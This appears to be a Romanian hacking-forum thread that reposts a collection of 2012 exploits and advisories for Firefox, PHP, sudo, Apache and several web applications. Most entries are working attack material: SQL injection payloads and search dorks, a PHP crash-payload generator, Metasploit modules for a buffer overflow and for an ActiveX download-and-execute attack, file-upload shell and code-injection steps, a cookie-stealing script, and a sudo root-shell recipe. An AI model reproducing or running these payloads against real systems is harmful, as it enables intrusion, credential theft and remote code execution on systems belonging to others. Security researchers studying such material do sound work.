mozilla firefox <= 10.0 local null byte bypass file check execution exploit <!-- [+] mozilla firefox <= 10.0 local null byte bypass file check execution exploit --> <!-- --> <!-- Vuln risk level: Medium --> <!-- Author: Todor Donev --> <!-- Author mail: todor.donev@@gmail.com --> <!-- --> <!-- Description: Allows local attackers to bypass file type checks and possibly execute programs via a jar: --> <!-- URI with a dangerous extension.--> <!-- See http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3285 for more --> <!-- --> <!-- Simple exploit for mozilla firefox 10.0, tested on Windows XP SP3 EN --> <!-- --> <!-- Greetz Tsvetelina Emirska again.. =) --> <!-- --> <html> <body onLoad=javascript:document.form.submit()> <form action="jar:file:///C:/Program%20Files/Mozilla%20Firefox/omni.ja!/components/browser.xpt%00.html"; method="GET" name="form"> </form> </body> </html> <!-- STOP ACTA !!! STOP PIPA !!! STOP SOPA --> Sursa: mozilla firefox <= 10.0 local null byte bypass file check execution exploit

Ce p mea deschide-ti o 100 de threaduri?

XRayCMS 1.1.1 SQL Injection Vulnerability # Exploit Title: XRayCMS 1.1.1 SQL Injection Vulnerability # Date: 2/5/2012 # Author: chap0 # Software Link: http://sourceforge.net/projects/xraycms/files/latest/download # Version: 1.1.1 # Tested on: Ubuntu XRay CMS is vulnerable to a SQL Injection attack which allows authentication bypass into the admins account. If a malicious user supplies ' or 1=1# into the applications user name field they will be logged into the applications admin account. Jan 29, 2012 – Contacted Vendor No Response Feb 05, 2012 – Public Disclosure Since the vendor did not reply we attempted to create our own fixes for this issue. The vulnerability exist in “login2.php” on lines 20 and 21. 17 if(!isset($_POST['username'])) header("Location: login.php?error_username"); 18 if(!isset($_POST['password'])) header("Location: login.php?error_password"); 19 20 $user = $_POST['username']; 21 $pass = $_POST['password']; If the lines 20 and 21 are changed to: $user = mysql_real_escape_string($_POST['username']); $pass = mysql_real_escape_string($_POST['password']); This will prevent the sql injection from happening in the user name field. Sursa: XRayCMS 1.1.1 SQL Injection Vulnerability

Tube Ace(Adult PHP Tube Script) SQL Injection # Exploit Title: Tube Ace(Adult PHP Tube Script) SQL Injection # Date: 05/02/2012 # Author: Daniel Godoy # Author Mail: DanielGodoy[at]GobiernoFederal[dot]com # Author Web: www.delincuentedigital.com.ar # Software: Tube Ace # http://www.tubeace.com # Tested on: Linux # Dork: "?viewStandard=0" [Comment] Greetz: Hernan Jais, Alfonso Cuevas, SPEED, Sensei, Incid3nt, Maximiliano Soler Sunplace, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0, InyeXion her0, r0dr1 y demas user de RemoteExecution www.remoteexecution.info www.remoteexcution.com.ar #RemoteExecution Hacking Group [PoC] http://localhost/mobile/search/?q=[SQL Injection] http://localhost/mobile/search/?q=1') AND (SELECT 9602 FROM(SELECT COUNT(*),CONCAT(CHAR(58,109,111,110,58),(SELECT (CASE WHEN (9602=9602) THEN 1 ELSE 0 END)),CHAR(58,107,109,109,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND ('LMEk'='LMEk&channel= [DEMO] http://server/mobile/search/?q=1%27%29%20AND%20%28SELECT%209602%20FROM%28SELECT%20COUNT%28*%29,CONCAT%28CHAR%2858,109,111,110,58%29,%28SELECT%20%28CASE%20WHEN%20%289602=9602%29%20THEN%201%20ELSE%200%20END%29%29,CHAR%2858,107,109,109,58%29,FLOOR%28RAND%280%29*2%29%29x%20FROM%20information_schema.tables%20GROUP%20BY%20x%29a%29%20AND%20%28%27LMEk%27=%27LMEk&channel= Sursa: Tube Ace(Adult PHP Tube Script) SQL Injection

Torrent

PHP 5.4.0RC6 64bit Denial of Service <?php /* This script generates a POST header that makes PHP 5.4.0RC6 *64 bit* try to execute code at 0x1111111111111111 (C) Copyright 2012 Stefan Esser PHP 5.3.9 requires you to know the address of a writable address filled with NULL. 32bit requires you to create a fake 32bit Hashtable instead of a 64bit one Because this vulnerability also allows leaking memory addresses ASLR can be "semi"-defeated. This means around 4000 tries = 4000 requests = 4000 crashes are enough to bruteforce code addresses to execute arbitrary code despite ASLR/NX better exploit might be possible after deeper research + heap massage This specific attack only works if there is no Suhosin-Patch -> RHEL, CentOS (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x00007fd959ca5f9d in _zend_hash_index_update_or_next_insert (ht=0x7fd96480d508, h=0, pData=0x7fff75c47bd0, nDataSize=8, pDest=0x7fff75c47bc8, flag=1, __zend_filename=0x7fd95a061b68 "/home/user/Downloads/php-5.4.0RC6/Zend/zend_hash.h", __zend_lineno=350) at /home/user/Downloads/php-5.4.0RC6/Zend/zend_hash.c:398 398 ht->pDestructor(p->pData); (gdb) i r rax 0x7fd9583352a0 140571464389280 rbx 0x0 0 rcx 0x8 8 rdx 0x111111111111111 76861433640456465 rsi 0x7fd95a077b08 140571495070472 rdi 0x7fd9583352a0 140571464389280 rbp 0x7fff75c47ae0 0x7fff75c47ae0 rsp 0x7fff75c47a80 0x7fff75c47a80 r8 0x7fff75c47bc8 140735169199048 r9 0x1 1 r10 0x6238396661373430 7077469926293189680 r11 0x7fd962f4c8e0 140571644840160 r12 0x7fd966b91da8 140571708038568 r13 0x0 0 r14 0xffffffff00000001 -4294967295 r15 0x7fd964b10538 140571673953592 rip 0x7fd959ca5f9d 0x7fd959ca5f9d <_zend_hash_index_update_or_next_insert+477> eflags 0x10206 [ PF IF RF ] cs 0x33 51 ss 0x2b 43 ds 0x0 0 es 0x0 0 fs 0x0 0 gs 0x0 0 (gdb) x/5i $rip => 0x7fd959ca5f9d <_zend_hash_index_update_or_next_insert+477>: callq *%rdx 0x7fd959ca5f9f <_zend_hash_index_update_or_next_insert+479>: cmpl $0x8,-0x3c(%rbp) 0x7fd959ca5fa3 <_zend_hash_index_update_or_next_insert+483>: jne 0x7fd959ca6031 <_zend_hash_index_update_or_next_insert+625> 0x7fd959ca5fa9 <_zend_hash_index_update_or_next_insert+489>: mov -0x18(%rbp),%rax 0x7fd959ca5fad <_zend_hash_index_update_or_next_insert+493>: mov 0x10(%rax),%rax (gdb) */ $boundary = md5(microtime()); $varname = "xxx"; $payload = ""; $payload .= "--$boundary\n"; $payload .= 'Content-Disposition: form-data; name="'.$varname.'"'."\n\n"; $payload .= chr(16); for ($i=1; $i<7*8; $i++) { $payload .= chr(0); } for ($i=1; $i<8; $i++) { $payload .= "\x11"; } $payload .= chr(1); for ($i=16+48+1; $i<128; $i++) { $payload .= chr(0); } $payload .= "\n"; for ($i=0; $i<1000; $i++) { $payload .= "--$boundary\n"; $payload .= 'Content-Disposition: form-data; name="aaa'.$i.'"'."\n\n"; $payload .= "aaa\n"; } $payload .= "--$boundary\n"; $payload .= 'Content-Disposition: form-data; name="'.$varname.'[]"'."\n\n"; $payload .= "aaa\n"; $payload .= "--$boundary\n"; $payload .= 'Content-Disposition: form-data; name="'.$varname.'[0]"'."\n\n"; $payload .= "aaa\n"; $payload .= "--$boundary--\n"; echo "POST /index.php HTTP/1.0\n"; echo "Content-Type: multipart/form-data; boundary=$boundary\n"; echo "Content-Length: ",strlen($payload),"\n"; echo "\n"; echo "$payload"; ?> Sursa: PHP 5.4.0RC6 64bit Denial of Service

PHP 5.4SVN-2012-02-03 htmlspecialchars/entities Buffer Overflow From: cataphract Operating system: Any PHP version: 5.4SVN-2012-02-03 (SVN) Package: Reproducible crash Bug Type: Bug Bug description:Buffer overflow on htmlspecialchars/entities with $double=false Description: ------------ Long entities can cause a buffer overflow because the loop only guarantees 40 bytes available in beginning. Test script: --------------- <?php echo htmlspecialchars('"""""""""""""""""""""""""""""""""""""""""""""', ENT_QUOTES, 'UTF-8', false), "\n"; Sursa: PHP 5.4SVN-2012-02-03 htmlspecialchars/entities Buffer Overflow

Download : The Basics of SQLi v1.0.0.rar Pass: ask@49!

Sunway Forcecontrol SNMP NetDBServer.exe Opcode 0x57 ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'Sunway Forcecontrol SNMP NetDBServer.exe Opcode 0x57', 'Description' => %q{ This module exploits a stack based buffer overflow found in the SNMP NetDBServer service of Sunway Forcecontrol <= 6.1 sp3. The overflow is triggered when sending an overly long string to the listening service on port 2001. }, 'Author' => [ 'Luigi Auriemma', # original discovery 'Rinat Ziyayev', 'James Fitts' ], 'License' => MSF_LICENSE, 'References' => [ [ 'BID', '49747' ], [ 'URL', 'http://aluigi.altervista.org/adv/forcecontrol_1-adv.txt' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Privileged' => true, 'Payload' => { 'DisableNops' => 'true', 'BadChars' => "\x0a\x0d\xae", }, 'Platform' => 'win', 'Targets' => [ [ # p/p/r ComDll.dll 'Windows', { 'Ret' => 0x100022c4 } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Sep 22 2011')) register_options( [ Opt::RPORT(2001) ], self.class ) end def exploit connect header = "\xeb\x50\xeb\x50" header << "\x57\x00" # packet type header << "\xff\xff\x00\x00" header << "\x01\x00" header << "\xff" footer = "\r\n" packet = rand_text_alpha_upper(65535) packet[0,header.length] = header packet[293,8] = generate_seh_record(target.ret) packet[301,20] = make_nops(20) packet[321,payload.encoded.length] = payload.encoded packet[65533,2] = footer print_status("Trying target %s..." % target.name) sock.put(packet) handler disconnect end end Sursa: Sunway Forcecontrol SNMP NetDBServer.exe Opcode 0x57

Icona SpA C6 Messenger DownloaderActiveX Control Arbitrary File Download and Execute ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'Icona SpA C6 Messenger DownloaderActiveX Control Arbitrary File Download and Execute', 'Description' => %q{ This module exploits a vulnerability in Icona SpA C6 Messenger 1.0.0.1. The vulnerability is in the DownloaderActiveX Control (DownloaderActiveX.ocx). The insecure control can be abused to download and execute arbitrary files in the context of the currently logged-on user. }, 'License' => MSF_LICENSE, 'Author' => [ 'Nine:Situations:Group::SnoopyAssault', # Vulnerability discovery and exploit 'juan vazquez' # metasploit module ], 'References' => [ [ 'CVE', '2008-2551' ], [ 'OSVDB', '45960' ], [ 'BID', '29519' ], [ 'URL', 'http://retrogod.altervista.org/9sg_c6_download_exec.html' ], ], 'DefaultOptions' => { 'ExitFunction' => "none", 'InitialAutoRunScript' => 'migrate -f' }, 'Payload' => { 'Space' => 2048, 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', { } ], ], 'DisclosureDate' => 'Jun 03 2008', 'DefaultTarget' => 0, 'Privileged' => false)) end def autofilter false end def check_dependencies use_zlib end def on_request_uri(cli, request) # Only IEs are potential targets # "File Session" is used when the ActiveX tries to request the EXE agent = request.headers['User-Agent'] if agent !~ /MSIE \d\.\d|File Session/ print_error("Target not supported: #{cli.peerhost}:#{cli.peerport} (#{agent})") return end payload_url = "http://" payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] payload_url += ":" + datastore['SRVPORT'] + get_resource() + "/#{@payload_rand}" if (request.uri.match(/#{@payload_rand}/)) return if ((p = regenerate_payload(cli)) == nil) data = generate_payload_exe({ :code => p.encoded }) print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...") send_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) return end exe = rand_text_alpha(rand(5) + 1 ) content = %Q| <html> <object id="DownloaderActiveX1" width="0" height="0" classid="CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61" codebase="DownloaderActiveX.cab#Version=1,0,0,1"> <param name="propProgressBackground" value="#bccee8"> <param name="propTextBackground" value="#f7f8fc"> <param name="propBarColor" value="#df0203"> <param name="propTextColor" value="#000000"> <param name="propWidth" value="0"> <param name="propHeight" value="0"> <param name="propDownloadUrl" value="#{payload_url}/#{exe}.exe"> <param name="propPostDownloadAction" value="run"> <param name="propInstallCompleteUrl" value=""> <param name="propBrowserRedirectUrl" value=""> <param name="propVerbose" value="0"> <param name="propInterrupt" value="0"> </OBJECT> </html> | print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") send_response_html(cli, content) handler(cli) end def exploit @payload_rand = rand_text_alpha(rand(5) + 5 ) super end end Sursa: Icona SpA C6 Messenger DownloaderActiveX Control Arbitrary File Download and Execute

swDesk Multiple Vulnerabilities # # Title : swDesk Multi Vulnerability # Author : Red Security TEAM # Date : 01/02/2012 # Risk : High # Vendor : http://www.swdesk.com/ # Tested On : Apache # Contact : Info [ 4t ] RedSecurity [ d0t ] COM # Home : http://RedSecurity.COM # # Exploit : # # I. Arbitrary File Upload Vulnerability # 1. Go to http://server/create_ticket.php # 2. Fil all Input Fields And Click on Submit Ticket # 3. Click on the View Ticket and you should go to the link Like : http://server/view_ticket.php?email=[Your Email]&id=1 # 4. You see Send Message box , Write any thing there and attach your PHP file in the Upload attachment and Click on Send Message # 5. You can see your attachment above Like : Attachment: shell.php , Click on it and you see your PHP code has been runed # # II. PHP Code Injection Vulnerability # 1. Go to http://server/signin.php : Vulnerability Input Fields : email , password # 2. Write your php in Input Fields Like : phpi${@print(RedSecurityTEAM)} # # III. XSS Vulnerability # 1. http://server/view_ticket.php?email=example@example.com&id=" onmouseover=alert(1) bad=" # 2. http://server/kb_search.php?keywords=" onmouseover=alert(1) bad="&mode=Search # # Thanks To : http://1337day.com/ , http://www.exploit-db.com/ , http://securityreason.com/ , http://packetstormsecurity.org/ # Sursa: http://www.exploit-db.com/exploits/18443/

Apache httpOnly Cookie Disclosure // Source: https://gist.github.com/1955a1c28324d4724b7b/7fe51f2a66c1d4a40a736540b3ad3fde02b7fb08 // Most browsers limit cookies to 4k characters, so we need multiple function setCookies (good) { // Construct string for cookie value var str = ""; for (var i=0; i< 819; i++) { str += "x"; } // Set cookies for (i = 0; i < 10; i++) { // Expire evil cookie if (good) { var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;"; } // Set evil cookie else { var cookie = "xss"+i+"="+str+";path=/"; } document.cookie = cookie; } } function makeRequest() { setCookies(); function parseCookies () { var cookie_dict = {}; // Only react on 400 status if (xhr.readyState === 4 && xhr.status === 400) { // Replace newlines and match <pre> content var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/); if (content.length) { // Remove Cookie: prefix content = content[1].replace("Cookie: ", ""); var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g); // Add cookies to object for (var i=0; i<cookies.length; i++) { var s_c = cookies[i].split('=',2); cookie_dict[s_c[0]] = s_c[1]; } } // Unset malicious cookies setCookies(true); alert(JSON.stringify(cookie_dict)); } } // Make XHR request var xhr = new XMLHttpRequest(); xhr.onreadystatechange = parseCookies; xhr.open("GET", "/", true); xhr.send(null); } makeRequest(); Sursa: Apache httpOnly Cookie Disclosure

Vastal I-Tech Agent Zone (search.php) Blind SQL Injection Vulnerability Agent Zone Vastal I-Tech Blind SQL Injection Vulnerability # Date: 31.01.2012 # Author: Cagri Tepebasili # Software : http://www.vastal.com/agent-zone-real-estate-script.html # Tested on: Linux Mint 12 ##################################################################################################################### The First Step >>> http://server/real/search.php?price_from=1000000.00+and+1=1&price_to=10000000.00 The Second Step >>> http://server/real/search.php?price_from=1000000.00+and+1=0&price_to=10000000.00 Injection >>> http://server/real/search.php?price_from=1000000.00[BlindSQLI]&price_to=10000000.00 Greetz : MythSEC <<< Sursa: Vastal I-Tech Agent Zone (search.php) Blind SQL Injection Vulnerability

Ez Album Blind SQL Injection Vulnerability # # Title : Ez Album Blind SQL Injection Vulnerability # Author : Red Security TEAM # Date : 31/01/2012 # Risk : High # Demo : http://www.scriptsez.com # Tested On : CentOS # Contact : Info [ 4t ] RedSecurity [ d0t ] COM # Home : http://RedSecurity.COM # # Exploit : # http://server/album/index.php?action=view&id=[BlindSQLi] # Sursa: Ez Album Blind SQL Injection Vulnerability

sudo 1.8.0 - 1.8.3p1 Format String Vulnerability Phenoelit Advisory <wir-haben-auch-mal-was-gefunden #0815 +--++> [ Authors ] joernchen <joernchen () phenoelit de> Phenoelit Group (http://www.phenoelit.de) [ Affected Products ] sudo 1.8.0 - 1.8.3p1 (http://sudo.ws) [ Vendor communication ] 2012-01-24 Send vulnerability details to sudo maintainer 2012-01-24 Maintainer is embarrased 2012-01-27 Asking maintainer how the fixing goes 2012-01-27 Maintainer responds with a patch and a release date of 2012-01-30 for the patched sudo and advisory 2012-01-30 Release of this advisory [ Description ] Observe src/sudo.c: void sudo_debug(int level, const char *fmt, ...) { va_list ap; char *fmt2; if (level > debug_level) return; /* Backet fmt with program name and a newline to make it a single write */ easprintf(&fmt2, "%s: %s\n", getprogname(), fmt); va_start(ap, fmt); vfprintf(stderr, fmt2, ap); va_end(ap); efree(fmt2); } Here getprogname() is argv[0] and by this user controlled. So argv[0] goes to fmt2 which then gets vfprintf()ed to stderr. The result is a Format String vulnerability. [ Example ] /tmp $ ln -s /usr/bin/sudo %n /tmp $ ./%n -D9 *** %n in writable segment detected *** Aborted /tmp $ A note regarding exploitability: The above example shows the result of FORTIFY_SOURCE which makes explotitation painful but not impossible (see [0]). Without FORTIFY_SOURCE the exploit is straight forward: 1. Use formatstring to overwrite the setuid() call with setgid() 2. Trigger with formatstring -D9 3. Make use of SUDO_ASKPASS and have shellcode in askpass script 4. As askpass will be called after the formatstring has overwritten setuid() the askepass script will run with uid 0 5. Enjoy the rootshell [ Solution ] Update to version 1.8.3.p2 [ References ] [0] http://www.phrack.org/issues.html?issue=67&id=9 [ end of file ] Sursa: sudo 1.8.0 - 1.8.3p1 Format String Vulnerability

phpShowtime Directory Traversal # # Title : phpShowtime Directory Travel # Author : Red Security TEAM # Date : 31/01/2012 # Download : http://phpshowtime.kybernetika.de/ # Demo : http://phpshowtime.kybernetika.de/demo/ # Tested On : CentOS # Dork : Copyright ©2005-2011 by Nova CMS. # Contact : Info [ 4t ] RedSecurity [ d0t ] COM # Home : http://RedSecurity.COM # # Exploit : # # http://server/index.php?r=i/[Your Directory] # Example : http://server/index.php?r=i/../../ # Sursa: phpShowtime Directory Traversal

Felicitari!